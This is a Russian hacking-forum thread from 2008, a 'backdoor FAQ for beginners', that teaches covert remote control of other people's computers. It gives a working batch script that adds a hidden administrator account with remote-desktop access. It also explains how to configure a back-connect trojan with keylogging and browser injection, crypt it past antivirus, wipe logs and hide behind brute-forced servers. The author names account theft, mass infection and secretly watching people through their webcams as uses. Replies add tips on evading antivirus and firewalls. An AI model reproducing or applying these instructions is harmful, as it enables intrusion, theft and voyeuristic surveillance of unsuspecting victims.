FAQ по бэкдорам для новичков

Тема в разделе "Статьи", создана пользователем NetSky, 18 дек 2008.

  1. NetSky
    NetSky Guest
    Вступление​

    Пишу статью ибо всегда было есть и будет большое кол-во вопросов, со стороны новичков, по настройке и использованию паблик-софта, для не совсем ординарных целей.
    ОффТоп: Я сам буду отсутствовать на время празднования нового года, примерно с 20-го сего месяца и до 10-го следующего, по сему могу заранее поздравить всех с наступающим и собственно в честь праздника - небольшая статейка. Как приеду, постараюсь написать статью на более оригинальную и интересную тему. И еще раз с праздником, всех благ!
    Собственно, начнем. Сперва поговорим о сути, а потом перейдем к конкретным примерам.

    И так, очень многие задают вопросы типа «Как взломать аккаунт друга?», «Как вернуть свой …?»(номер, акк, и т.п…), «Как навредить кому-нибудь?», «Как можно получить доступ к удаленному компьютеру?» и т.д… На самом деле – очень просто. Конечно для одних целей существуют трояны, для других – вирусы, но бэкдор дает вам полный удаленный доступ к компьютеру. А дальше вы можете использовать уже в своих целях, можете подгрузить трояна типа пинча, можете накачать тонну вирусов и запустить, можете скрыто произвести нужные вам действия и при этом хозяин «зараженной» машины останется в неведении. Удаленный доступ открывает перед вами полный доступ к машине, можете удовлетворить свои потребности собрав ценную информацию с компьютера, можете скрыто запустить веб-камеру и наблюдать за собеседницей которая только что вышла из душа ; ). Как вам использовать доступ – уже ваше дело, а я постараюсь рассказать как можно более подробно о способах получения этого доступа.

    Определения​

    Начнем давайте с определения самого слова «бэкдор» (Backdoor - «черный ход»).

    От себя же скажу - это программа, попадающая под определение «вредоносной», которая дает тебе некий, скрытый доступ к удаленной машине.

    Любой «черный ход», реализованный не средствами самой системы, то есть - конкретная программа, бывает двух видов:
    • BindShell - самый распространенный, работает по архитектуре "клиент-сервер", то есть серверная часть - ожидает соединение.
    • Back Connect - применяется для обхода брандмауэров, сервеная часть - сама пытается подключиться к клиентской (собственно к компьютеру, с которого будете управлять серверной частью, на компьютере «жертвы»).
    И так, первое – вы подключаетесь к «жертве», естественно зная IP (если соединение реализуется по TCP/IP-протоколу, напрямую), второе – серверная часть на зараженном компьютере «жертвы», сама подключается к вам.

    Простейший пример​

    По сути бэкдором можно назвать и созданную, «кое-как» скрытую, учетную запись пользователя удаленного рабочего стола. Реализуется очень просто:
    Сперва идем:
    Код:
    Мой компьютер > Свойства > Удаленные сеансы > Ставим обе галочки
    Далее:
    Код:
    #Консоль
    net user admin pass /add	#Добавляем нового пользователя с логином «admin» и паролем «pass».
    net localgroup Administrators admin /add	#Добавляем нашего нового пользователя с ником «admin» в группу администраторов «Administrators».
    net localgroup "Remote Desktop Users" admin /add	#Добавляем этого же пользователя также в группу пользователей удаленного рабочего стола «Remote Desktop Users»
    net accounts /maxpwage:unlimited		#Наш пароль никогда не истечет
    REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0x00000000 #Скрываем вашего юзера от отображения при старте системы. Не забудте поменять параметр Name, на имя юзера созданной учетки …
    exit	#Выход
    Можно прописать все поочередно в консоли, но удобнее создать *.bat файл и скопировать команды, почистив от комментариев.
    Таким образом сможем подключиться к удаленному компьютеру через «Мастер подключений к удаленному рабочему столу» введя внешний IP-адрес машины и впоследствии ваш логин и пароль. Это был простейший вариант, т.к. даже «бэкдор, как учетку» можно изобразить несколько сложнее, об этом, в соответствующей теме. А мы пойдем дальше.

    Целевой софт​

    По своим функциям, подобный софт бывает очень разным. Все зависит от потребностей, в некоторых случаях – вполне достаточно консоли, а иногда нужно вести кей-логи, снимать скрины, запускать веб-камеру и т.д. Так что если вы ни чуть не кодер и не особо располагаете материальными средствами, вам придется выбирать из так называемого паблик-софта. В настройке, как правило, ничего сложного нет. Давайте приступим к практическому изучению.
    Я, пожалуй, буду использовать для примера бэкдор, работающий по системе «Back Connect» - зараженный компьютер сам пытается подключиться к Вам. При выборе бэкдора, для примера к статье, я долго не задумывался и выбрал PI версии 2.3.2. Т.к. самому не так давно приходилось иметь с ним дело. Достаточно новый и многофункциональный бэкдор, размер самого троя на выходе, довольно маленький и при этом он очень хорошо поддается криптовке. По сему, остановился на нем.
    Скачать:




    И начнем, пожалуй, с собственной безопасности. Какой метод взаимодействия с сервера с клиентом выбрать – зависит от ваших симпатий и конечно же от ситуации. Как я уже сказал, начнем с селф-секурити. =)

    Подготова почвы​

    И опять же, все зависит от целей. Если вам нужно поприкалываться над соседом, думаю никакой опасности для вас, кроме как в реакции самого соседа, более нет, но если вы решили “собирать” аккаунты на различных сайтах и мессенджерах, либо же использовать массово зараженные машины в своих целях, либо же “обрабатывать” машины официальных лиц, то вам нужно хорошо позаботиться о том чтобы вас не вычислили. Конечно же, о том как вы его будете распространять, мы говорить не будем, тут уж соксы вам на ноги, но рассмотрим пример уже управления зараженной машиной, таким образом, чтобы вычислить вас было как можно сложнее. Для этих целей мы будем использовать удаленный компьютер или «дедик» (dedicated server - выделенный сервер). Если вы считаете, что подобные меры вам не пригодятся, можете пропустить соотв. пункты! Выделенный сервер можно не дорого приобрести у соотв. селлеров (_asechka.ru, _grabberz.com – там эта тема затронута более подробно), можно повозившись денек, сбрутить самому (ссылка). И так, допустим вы уже распологаете удаленной машиной, но как правило, если аккаунт администратора был сбручен, пароль на нем стоит простой и тому кто “выйдет” на вас, это может быть известно, и он также может попасть на эту машину с правами администратора, а соответственно и распологать возможностью изучить логи виндоус, и учетные записи пользователей на этой машине.

    • Чистим логи. Для этого удобнее использовать соотв. софт. Стандартные логи виндоус можно почитить посредством clearlogs, которую часто используют на дедиках, чтобы не оставлять следов. Запускается через *.bat файл. Скачать можно по ссылке. Сперва разархивируйте, запустив скачанный файл, батник прилагается.
    • Не мусорим в системе и скрываем свои файлы. Ну по первому думаю все понятно, не стоит трогать(изменять) ничего имеющегося на харде. А скрывать клиентскую часть троя можно по-разному. Стандартными средствами виндоус – через второй клик мышкой можно «скрыть файл/папку», но все прекрасно знают, что эту папку/файл также спокойно можно «раскрыть». И из стандартных средств можно многое придумать и из нестандартных выбрать, различные программы для защиты паролем и скрытия файлов на компьютере…

    Настройка «сервера»​

    Вроде перечислил основные пункты, если что забыл, думаю вы в состоянии додумать сами. Перейдем к настройке самого бэкдора. Разархивировав скачанный бэкдор, в папке вы надете *.exe файл. Запускаем и переходим во вкладку File > New Server. Дальше первое поле называется Profiles, создаем будущий «конфиг» вашего сервера. Дальше жмем Create Profile и именуем его как-нибудь, переходим в следующее поле – Connection. Сдесь вводим в строку DNS айпи-адрес и порт (от 1024 до 65535), в виде IP:port (пример - 127.0.0.1:5566) на который время от времени будет пытаться подключиться сервер с зараженного компьютера, а то есть ваш айпи адрес (вашего дедика или т.п.), там где его будет ожидать запущенная клиентская часть. Далее заполняем строки ID, Group и Password. ID – имя под которым клиент будет распознаваться сервера, в группу можете вписать также любое «название» и в поле пароль – пароль под которым клиент будет ожидать соединения с сервером, а сервер проверять «валидность» пароля. Там же можно использовать вместо обычного пароля файл-ключ, но это уже на ваш вкус.
    Далее идем во вкладку Install и выбираем имя файла, под которым сервер будет «скрываться» в системе и тому подобные настройки. Далее переходим во вкладку Advanced и выбираем настройки на свое усмотрение, поддерживать ли ф-цию кей-логгера, инъектиться ли в браузер и т.п. настройки. После во вкладке Build можете выбрать иконку для своего «сервера» и собственно сохранить его на диск.
    Уже каким криптором дальше его криптовать – ваше дело. У нас постоянно пополняется раздел крипторов (ссылка) и там всегда можно найти что-то интересное.

    «А что дальше?»​

    Пологается что вы уже закриптовали и запустили его, например у себя на машине, для теста. Далее запускаете сам бэкдор File > New Client и указываете пароль и порт под которым клиент будет ожидать коннекта со стороны сервера. После в списке клиентского приложения у вас появится запись о новом подключении, можете делать двойной клик и изучать интерфейс управления «зараженной» машиной. Можно делать скрины, управлять файловой системой, запускать веб-камеру, парсить кэш браузеров, редактировать реестр и еще много чего, тут уж разбирайтесь сами, все зависит от ваших потребностей. Подобный софт можно найти на сайтах хак-тематики, а также у нас в специальном разделе (ссылка).

    Заключение​

    В заключение скажу, все действия описанные выше, относятся к незаконным, попадают под несколько статей УК РФ и автор ни в коем случае не «подстрекает» вас на повторение выше рассмотренных действий. Весь изложенный материал был опубликован для ознакомления и изучения, автор не несет ответственности за любые действия людей, решивших воспользоваться данным материалом и нарушить закон.

    С вами был NetSky.
    Специально для Xaker.Name.
     
    18 дек 2008
    5 пользователям это понравилось.
  2. xeran
    xeran Guest
    WhiteCanine,
    А вот это уже зависит от приватности софта ну и от рук атакующего.

    З.Ы.Думаю супер приват брандмаузерами не палица.)))
     
    20 дек 2008
  3. anxa
    anxa Guest
    все зависит от того, кому и как собираетесь "впарить подарок".
    если уровень повыше у "фраера", то придется заранее позаботится о том, что бы "подарок" не был спален следующим:
    1). файловый антивирус (по сигнатуре - не важно какой - ползающей, бегающей, плавающей, стоячей и т.д)
    2). эмулятором
    3). hips
    4). фаервол

    Также стоит учесть еще кучу всего при атаке на целевой объект с повышенной квалификацией - что за учетка, что за ось, что за антивирус (т.е какой именно), какое подключение к интернету (а то, может оказаться так, что даже при отсутствии всяких защит бекдор все равно не сможет работать - не будет коннекта) и т.д и т.п
     
    24 дек 2008
Загрузка...